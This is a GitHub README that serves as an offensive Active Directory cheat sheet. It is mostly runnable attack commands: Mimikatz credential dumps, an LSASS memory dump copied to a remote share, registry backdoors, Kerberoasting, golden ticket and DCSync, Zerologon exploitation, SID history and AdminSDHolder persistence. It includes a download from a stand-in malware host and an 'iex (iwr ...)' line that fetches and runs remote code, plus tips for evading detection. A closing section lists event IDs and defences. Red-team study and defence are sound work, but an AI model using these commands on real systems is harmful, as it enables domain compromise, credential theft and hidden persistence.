Skip to content

A set of instructions, command and techniques that help during an Active Directory Assessment.

Notifications You must be signed in to change notification settings

thecybermafia/OffensiveActiveDirectory

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 

Repository files navigation

Offensive Active Directory

Summary

This document is designed to be a used in a red team assesment and contains commands, tools and methods with which anyone can attack and defend active directory.

Tools

Domain Recon

To Query Active Directory

  • [ADSI]
  • System.DirectoryServices.ActiveDirectory
  • Powershell AD Module
  • PowerView
    • When using PowerView beware of AVs / EDR you can use SharpView or modify it for own use.
  • Bloodhound
    • These days many environments have deception solutions / Microsoft ATA or similar software that detect bloodhoound data collection. Be careful when you use this.

Domain Enumeration

  • Gets you the domain name
$ADClass = [System.DirectoryServices.ActiveDirectory.Domain]
$ADClass::GetCurrentDomain()

Domain Recon

  • Gets you the domain information
  • ADModule
Get-ADDomain
Get-ADDomain -Identity security.local
(Get-ADDomain).DomainSID

Enumerate usernames

enum4linux

Extract machine usernames (user$) from above

Masscan all "user$.domain_name" for open ports

masscan --rate 100000 -e eth0 --ports<port range> --open-only <SCAN RANGE>

Nmap all "user$.domain_name" for open ports

  • Nmap all "user$.domain_name" for open ports/services

  • Tuned Nmap

    nmap -Pn -n -A -T4 --top-ports=1000 --max-rtt-timeouts=500ms --initial-rtt-timeout=200ms --min-rtt-timeout=2--ms --open --stats-every 5s <IP/Range>
    

Get Default Domain Policies

  • Gets you the domain policies related to kerberos
  • PowerView
Get-DomainPolicy
(Get-DomainPolicy)."System Access"
(Get-DomainPolicy)."Kerberos Policy"

Find Domain Controllers

  • Gets the Domain Controller you are connected to
  • AD Module
Get-ADDomainController

Trust Enumeration

  • Powerview
Get-NetDomainTrust
Get-NetDomainTrust -Domain security.local
Get-NetForestTrust
  • AD Module
Get-ADForest
Get-ADForest -Identity security.local
(Get-ADForest).Domains
Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"'

User Recon

  • AD Module
Get-ADUser -Filter * -Properties *
Get-ADUser -Identity domainAdmin -Properties *
Get-ADUser -Server DC.security.local
Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberName *Properties | select name
Get-ADUser -Filter * -Properties * | select name,@{expression={[datetime]::fromFileTime($_.pwdlastset)}}
  • Look at logoncount, badpwdcount, pwdlastset find real users and dodge fake and decoy users.
  • AD Module
Get-ADUser -Filter 'If you have a filter' -Properties Description | select name,Description | Export-CSV "Description.csv"
  • This will generate a 4662, which you can look for with the command
(Get-EventLog -LogName Security | Where-Object {$_.EventID -eq 4662} | 
Select-Object -Property Category,Index,TimeGenerated,
EntryType,Source,InstanceID,Message) -match "domainAdminn" | Format-Table -AutoSize

Computer Recon

  • AD Module
Get-ADComputer -Filter * -Properties *
Get-ADComputer -Filter * | select name
Get-ADComputer -Filter 'OperatingSystem -like "*Server 2016*"' -Properties OperatingSystem | select name,OperatingSystem
Get-ADComputer -Filter * -Properties DNSHostName | %{Test-Connection -Count 1 -ComputerName $_.DNSHostName}

Groups Recon

  • AD Module
Get-ADGroup -Filter * | select name 
Get-ADGroup -Filter * -Properties *
Get-ADGroup -Filter 'Name -like "*admin*"' | select Name
Get-ADGroupMember -Identity 'Administrators' -Recursive -Server <> | % {Get-ADUser $_ -prop ServicePrincipalName} | Where {$_.ServicePrincipalName}
  • Key Admins and Enterprise Key Admins introduced from Windows Server 2016

Memership Recon

  • Look for IsGroup - Groupception i.e. where groups are a part of groups.
  • Built-in admins renaming is useless as it will have 500 as SID ending. Use this technique if you can't find the built-in administratrator by name.
  • Recursive gets the details of sub existing groups as well
  • AD Module
Get-ADGroupMember -Identity "Domain Admins" -Recursive
Get-ADPrincipalGroupMembership -Identity domainAdmin
  • Powersploit
Get-NetGroupMember -GroupName '*Admin' -Domain security.local | Select-Object MemberName
  • Filter based script
$Groups = Get-ADGroup -Filter * -SearchBase "OU=confidential,DC=security,DC=local"
$Members = foreach ($Group in $Groups)
{
    Get-ADGroupMember -Identity $Group |
    Where-Object objectClass -eq 'Group' |
    Select-Object Name,SamAccountName
}
Write-Output $Members

Group Policy Recon

  • AD Module
Get-GPO -All
Get-GPResultatnSetOfPolicy -ReportType Html -Path C:\Users\Administrator\report.html
  • PowerView
Get-NetGPO | select dispalyname
Get-NetGPO -ComputerName <>
Get-NetGPOGroup

Check policy from the server itself

gpresult /R /V
Find-GPOComputerAdmin -Computername <>
Find-GPOLocation -UserName domainAdmin -Verbose

OU Recon

  • PowerView
Get-NetOU -FullData
Get-NetOU -GPOname "{GUID}"
  • AD Module
Get-ADOrganizatioalUnit -Filter * -Properties *
Get-GPO -Guid {GUID}

Special Target Recon

Remote Registry and Local Administrator rights - PowerView

  • PowerView
Get-NetLoggedon -ComputerName 
Get-LoggedonLocal -ComputerName 
Get-LastLoggedOn -ComputerName

Find Servers with Shares

  • PowerView
Invoke-ShareFinder -Verbose
Invoke-ShareFinder -Verbose -ExcludeStandard -ExcludePrint -ExcludeIPC
Invoke-FileFinder -Verbose

Get High-Value Target where multiple people login like file server

  • PowerView
Get-NetFileServer

User Hunting

  • PowerView
Find-LocalAdminAccess -Verbose

This invokes Get-NetComputer and uses Invoke-CheckLocalAdminAccess

  • PowerView
Find-WMILocalAdminAccess.ps1
Invoke-EnumerateLocalAdmin -Verbose

This Looks for Domain Admin Sessions - Short Path

  • PowerView
Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"
Invoke-UserHunter -CheckAccess

Domain ACL Enumeration

Get-ObjectAcl -SamAccountName student1 -ResolveGUIDs
Get-ObjectAcl -ADSprefix 'CN=Administrator,CN=Users' -Verbose
(Get-Acl 'AD:\CN=Administrator,CN=Users,DC=security,DC=local').Access
Get-ObjectAcl -ADSpath "LDAP://" -ResolveGUIs -Verbose
Invoke-ACLScanner -ResolveGUIDs
Get-PathAcl -Path "\\security.local\sysvol"

SQL Server Recon

Get-SQLInstanceDomain
Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
Get-SQLServerLink

Exploitation

PowerShell basics

start powershell -credential ""
Enter-PSSession -ComputerName COMPUTER -Credential USER
Invoke-Command -ComputerName <> -ScriptBlock ${function:hello}
ls function:
Invoke-Command -FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName <> 
Invoke-Mimikatz -DumpCreds -ComputerName
Exit-PSSession

Enable PS Remoting

  • wsmprovhost is executed on a client computer when running PSRemoting
  • PSExec
\PsExec.exe \\Computer -u domain\user -s powershell Enable-PSRemoting -Force
Invoke-WmiMethod -ComputerName <> -Namespace root\cimv2 -Class Win32_Process -Name Create -Credential "domain\user" -Impersonation 3 -EnableAllPrivileges -ArgumentList "powershell Start-Process powershell -Verb runAs -ArgumentList 'Enable-PSRemoting –force'"
  • WMI
Invoke-WmiMethod -ComputerName localmachine.security.local -Namespace root\cimv2 -Class Win32_Process -Name Create -Credential "security.local\domainAdmin" -Impersonation 3 -EnableAllPrivileges -ArgumentList "powershell Start-Process powershell -Verb runAs -ArgumentList 'Enable-PSRemoting –force'"

Privilege Escalation - Local Admin

  • PowerSploit
Get-ServiceUnquoted -Verbose
Get-ModifiableServiceFile -Verbose
Get-ModifiableService -Verbose
  • WMI
Get-WmiObject -Class win32_service | Where-Object {$_} | Where-Object {($_.pathname -ne $null) -and ($_.pathname.trim() -ne '')} | Where-Object { (-not $_.pathname.StartsWith("`"")) -and (-not $_.pathname.StartsWith("'"))} | Where-Object {($_.pathname.Substring(0, $_.pathname.ToLower().IndexOf(".exe") + 4)) -match ".* .*"}

Reigstry Backdoors

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d “cmd” /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
REG ADD HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f

Memory dump LOLBAS

Rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> C:\temp\crash_dump.bin full
Copy-Item –Path C:\temp\crash_dump.bin –Destination '\\192.168.1.2\c$'

Download a Program

$url = "https://myhost.malware/file.exe"
$output = "./file.exe"
Invoke-WebRequest -Uri $url -OutFile $output

Query Sessions

query session
logoff ID

View passwords in cleartext

  • Powershell as Admin
New-ItemProperty "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" -Name "UseLogonCredential" -Value 1 -PropertyType "DWord"
  • cmd as admin
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

RDP without password

  • Enable Restricted Admin to RDP without password
  • Enable RestrictedAdmin to login with NTLM hash and mstsc.exe /RestrictedAdmin
  • Use mimikatz to PTH / PTT and launch mstsc.exe /RestrictedAdmin after adding this key.
REG ADD HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f

Gain foothold

  • Reset password of users who have PASSWD_NOTREQD flag set and have never set a password.
  • BONUS: if they are part of a group which have extended rights. You can also use this account to persist, just make sure this account is ancient.
Get-ADUser -Filter "useraccountcontrol -band 32" -Properties PasswordLastSet | Where-Object { $_.PasswordLastSet -eq $null } | select SamAccountName,Name,distinguishedname | Out-GridView 

ASEPRoast

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Add-Type -AssemblyName System.IndemtityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"
Invoke-Mimikatz -Command '"kerberos::list /export"  
python tgsrepcrack.py wordlist.txt .kirbi
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth 
Set-DomainObject -Identity -XOR @{useraccountcontrol=4194304} -Verbose
Get-ASREPHash -UserName -Verbose
Invoke-ASREPRoast -Verbose

Unconstrained Delegation

Get-NetComputer -UnConstrained
Get-NetUser -UnConstrained
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq True}
Invoke-Mimikatz -Command '"sekurlsa::tickets"'

msDS-AllowedToDelegateTo

Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

Trusts

Forest to Forest

([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
lsadump::trust /patch
kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:e4e47c8fc433c9e0f3b17ea74856ca6b /user:Administrator /service:krbtgt /target:moneycorp.local /ticket:c:\ad\tools\mcorp-ticket.kirbi
.\asktgs.exe c:\temp\ticket.kirbi CIFS/DC.parent.local
.\Rubeus.exe asktgs /ticket:c:\ad\tools\mcorp-ticket.kirbi /service:LDAP/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt
dir \\machine.domain.local\c$

Mimikatz

Remove protections such as PPL and bypass Credential Guard

privilege::debug
!+
token::elevate
!processprotect /remove /process:LSASS.EXE
misc::memssp
  • Dump passwords
Invoke-Mimikatz -Command "privilege::debug" "sekurlsa::logonpasswords full"
Invoke-Mimikatz -Command "privilege::debug" "sekurlsa::wdigest"
  • MiniDump
privilege::debug
sekurlsa::minidump crash_dump.bin
sekurlsa::logonPasswords
  • Pass the Hash
Invoke-Mimikatz -Command "privilege::debug" "sekurlsa::pth /user:Administrateur /domain:security.local /ntlm:xxxxxxxxxxxxx"
  • Export Tickets
Invoke-Mimikatz -Command "privilege::debug" "sekurlsa::tickets /export"
  • List Kerberos encryption keys
Invoke-Mimikatz -Command "privilege::debug" "sekurlsa::ekeys"
  • Credential Manager & DPAPI
dir \\192.168.1.2\c$\Users\<username>\AppData\Local\Microsoft\Credentials\*
mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\164451c5ed8ad780d136e400bd0c50c8
Invoke-Mimikatz -Command "privilege::debug" "sekurlsa::dpapi"
mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\164451c5ed8ad780d136e400bd0c50c8 /masterkey:e605b19f96917ed2a29c816eb2f2cfdb85c9ba67379e62721b77b3ee0e23ec6e253ba6202a1595dc63083212d8933a11bc93fc85c5bac7f04406d5d5af2e57a3
  • Vault
vault::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Vault\"
  • List Kerberos credentials for all authenticated users (including services and computer account)
Invoke-Mimikatz -Command "privilege::debug" "sekurlsa::kerberos"
  • Dump all local credentials on a Windows computer
Invoke-Mimikatz -Command "token::elevate" "lsadump::sam"
  • DCSync - Golden Ticket
mimikatz "lsadump::dcsync /domain:security.local /user:netbios\krbtgt"
.\mimikatz.exe kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt
  • Zerologon
lsadump::zerologon /server:DC.security.local /account:DC$
lsadump::zerologon /server:DC.security.local /account:DC$ /exploit
lsadump::dcsync /domain:security.local /dc:DC /user:krbtgt /authuser:DC$ /authdomain:security /authpassword:"" /authntlm

Priv Escalation - AD

Rubues.exe monitor /interval:1 > tickets.txt
SpoolSample.exe target client

HeidiSQL Portable

select * from openquery("dcorp-sql1",'select * from masters..sysservers ')
Get-SQLServerLinkCrawl -Instance <> -Verbose
EXECUTE('sp_configure "xp_cmdshell",1;reconfigure;')AT("eu-sql")
Get-SQLServerLinkCrawl -Instance <> -Query "exec master ..xp_cmdshell 'whoami'"

Persistence

Golden Ticket

  • Provide the new ID with ACLs to DCSync.
  • Give yourself or the victim Replicate DC, Replicate All, Replicate In Filtered Set to DCSync.
Set-ADACL -DistinguishedName 'DC=SRV,DC=security,DC=local' -Principal domainAdmin -GUIDRight DCSync -Verbose
mimikatz "lsadump::dcsync /domain:security.local /user:netbios\krbtgt"
  • krbtgt requires 2 reset to mitigate golden ticket
  • Evade time based detection with renewmax
  • Bypass the MaxTicketAge when creating a golden ticket and check for detection
kerberos::golden /admin:ADMIINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt

kerberos::golden /user:Administrator /domain:security.local /sid:S-1-5-21-123456789-1234567890-1111112345 /aes128:xxxxx id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt

WMI

  • Add WMI Rights on a DC as persistence and execute code wheneever you want.
  • Add you account to dcomcnfg WMI -> Component Services (COM Security) and Comp Management (WMI Control - root namespace)

AdminSDHolder

  • This privilege will not add the ID in the Domain Admin group, however allows the ID to modify the Domain Admins group.
  • ADModule
Set-ADACL -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=SRV,DC=security,DC=local' -Principal domainAdmin -Verbose
Add-ADGroupMember -Identity 'Domain Admins' -Members testda -Verbose
Add-ObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=security,DC=local' -PrincipalIdentity hacker -Verbose -Rights All
Get-ObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=security,DC=local' -Verbose 
  • Invoke-ADSDPropagation
powershell.exe iex (iwr 'https://raw.githubusercontent.com/edemilliere/ADSI/master/Invoke-ADSDPropagation.ps1')
Invoke-ADSDPropagation

SID History

  • Modify the SIDHistory attribute of an ID to the SID of a privileged user.
  • Allows the user to have high privileges without being a member of that group.
  • Nice technique, however it is getting detected easily now.
  • Check if domain / trust have SID Filtering enabled beforehand.
privilege::debug
token::elevate
sid::patch
sid::add /sam:"hacker" /new:S-1-5-21-123456789-1234567890-1111112345-519

Enable DSRM Admin Login

  • Use mimikatz to dump the DSRM Admin password.
  • This hash is never changed by SysAdmins as this is a recovery account.
privilege::debug
lsadump::sam
  • Copy the NTLM Hash
Domain : SECURITY
SysKey : 48e9dfa91da8e1b32a38b9e45323e430
Local SID : S-1-5-21-123456789-1234567890-1111112345

SAMKey : 2c9d7841c1ab3a64b7e0f8d5ee3ad828

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: af5adaaf26ccc3fab908fcb5435b49d8
  • PowerShell
New-ItemProperty “HKLM:\System\CurrentControlSet\Control\Lsa\” -Name “DsrmAdminLogonBehavior” -Value 2 -PropertyType DWORD
  • cmd
REG ADD HKLM\System\CurrentControlSet\Control\Lsa\ /v DsrmAdminLogonBehavior /t REG_DWORD /d 1 /f

ACE Format

  • ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid
  • RACEToolkit

Protection

  • Limit DAs login, if DA login is necessary donot allow other administrators to login to that machine.

  • Never run service with a DA priv Add-ADGroupMember -Identity 'Domain Admins' -Members newDA -MemberTimeToLive (New-TimeSpan -Minutes 20)

Golden Ticket

  • 4624: Account Logon
  • 4634: Account Logoff
  • 4672: Admin Logon
Get-WinEvent -FilterHashtable @{Logname='Security';ID=4672} -MaxEvents 1 | Format-List -Property *

Silver Ticket

  • 4624: Account Logon
  • 4634: Account Logoff
  • No 4672 due to Silver Ticket

Skeleton Key

  • System 7045 - A service was installed in the system
  • 4673 - Sensitive Privilege Use
  • 4611 - logon process reg with LSA
New-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name RunAsPPL -Value 1 -Verbose

DSRM Admin Logon Detection

  • 4657 - Audit creation/change of DSRMAdminLogonBehavior

Kerberoasting

  • 4769 : kerberos ticket was requested
  • Managed Service Accounts - Automatic change of password perodically
  • Service name should not be krbtgt
  • Service name should end with $
  • account name should not be machine@domain
  • Failure code is '0x0'
  • Encryption type should be 0x17

Delegation defenses

  • Account is sensitive and cannot be delegated for privileged accounts

ACL Attacks

  • 4662 - An operation was performed on an object

  • 5136 - A directory service object was modified

  • 4670 - Permissions on object were changed

  • 4780 - The ACL was set on accounts which are members of administrators groups

  • 4756 - Account was added to security-enabled universal group

  • http://github.com/canix1/ADACLScanner

SIDFiltering

  • Enable SIDFiltering
  • Selective Authentication

ATA

  • 4776

  • Builds profile over time

  • UEBA in 4 weeks for org

  • Lightweight gateway on DCs

  • Ignore Get-NetGroupMember and Get-NetComputer

  • Use AES256 and AES128 to bypass Over Pass The Hash Detection and Golden Ticket Detection

  • Envrypted PA-DATA PA-ENC-TIMESTAMP

  • Create Ticket for non-existent user

  • DCSync is not spoofable until ST is used

  • DCShadow is not detected, which allows DCSync

LAPS

  • ms-mcs-AdmPwd
  • ms-mcs-AdmPwdExpirationTime
  • AdmPwd.dll
  • Which users are allowed to view these LAPS

Credential Guard

  • Blocks PTH and over PTH
  • SAM and LSA Secrets are not protected
  • Cannot be enabled over a domain controller as it breaks authentication over there

Protected Users Group

  • Cannot use CredSSP and WDigest - clear text caching stop
  • NTLM is not cached
  • Kerberos doesnot use DES or RC4 keys
  • If domain functional level is Sever 2012 R2
    • No NTLM Auth
    • No DES or RC4 keys
    • No delegation
    • No renewal of TGT
  • MS to add DAs and EAs to this group without testing the impact of "lockout"

Privileged Administrative Worksatations (PAWs)

  • Deploy PAWs like solution if possible

GPO Protection

  • WMI Filtering
  • Change machine policy for GPO to 'Domain Computers' and remove read for 'Authenticated Users' in GPO settings
  • Add specific computers to GPO in filtering
  • Attacker tip: write directly to SYSVOL to avoid GPO audit
  • MS Pass the hash whitepaper

AD Security Model

  • Tier 0 - Accounts, Groups and computers such as dc, da and ea
  • Tier 1 - Accounts, Groups and computers such as local admin on multiple servers with business value
  • Tier 2 - Administrative accounts such as help desk, support admin

Control Restrictions - What admins control

Logon Restrictions - Where admins can log-on to

Enhanced Security Admin Environment

Forest - a security boundary

  • Administrative Forest called Red Forest
  • Selective Authentication in Red Forest

PowerShell version 5

  • 4104 Suspicious (Script Block Logging)
  • Module is highest, System wide Script is high
  • PSAmsi-Mimimizing-Obfuscation-To-Maximize-Stealth

Deception

  • Password does not expire
  • Trusted for Delegation
  • Users with SPN
  • Password in description
  • High Privileged Users
  • ACL rights over other users, groups or containers
  • GenericRead for "Everyone"
  • 4662 log - An operation was performed on an object
  • x500uniqueIdentifier
  • Older Operating Systems
  • DCShadow for Deception - chances of auth failure
  • Forest Admins
  • Set Logon Workstation to a non-existent machine
  • Deny logon to user
  • 4768 Kerberos use
  • Master user and Slave user
  • Rights to GA - Slave user

Things to watch out to make deception real

  • objectSID
  • lastLogon, lastlogotimestamp
  • Logoncount
  • whenCreated
  • Badpwdcount
  • Honeypot buster tracks 6 logons

References

Wiki

DCShadow

BloodHound

CrackMapExec

EmPyre

Red Teaming AD (PDF)

Attack Methods - Domain Admin

Attacking Domain Trusts

Misc Tools/Scripts

Attack Kerberos

Protocol Info

Attacking Kerberos

Attack Kerberos w/o Mimikatz

Roasting AS-REPS

Kerberos Party Tricks

Persistence

AD Persistence

LLMNR/NetBios-NS spoofing

Responder

Metasploit

GPO

CPasswords

gp3finder -A -t DOMAIN\_CONTROLLER -u DOMAINUSER\
  • Locate SYSVOL

    • \\domain_controller\SYSVOL\DOMAIN_NAME\Policies

    • Metasploit GPP Module

    • Decrypt GPP Password

      • PowerSploit - Get-GPPPassword

Detailed Group Policy Information

gpresult \[/x\], \[/h\] &lt;FILENAME&gt;

Privilege Escalation

Windows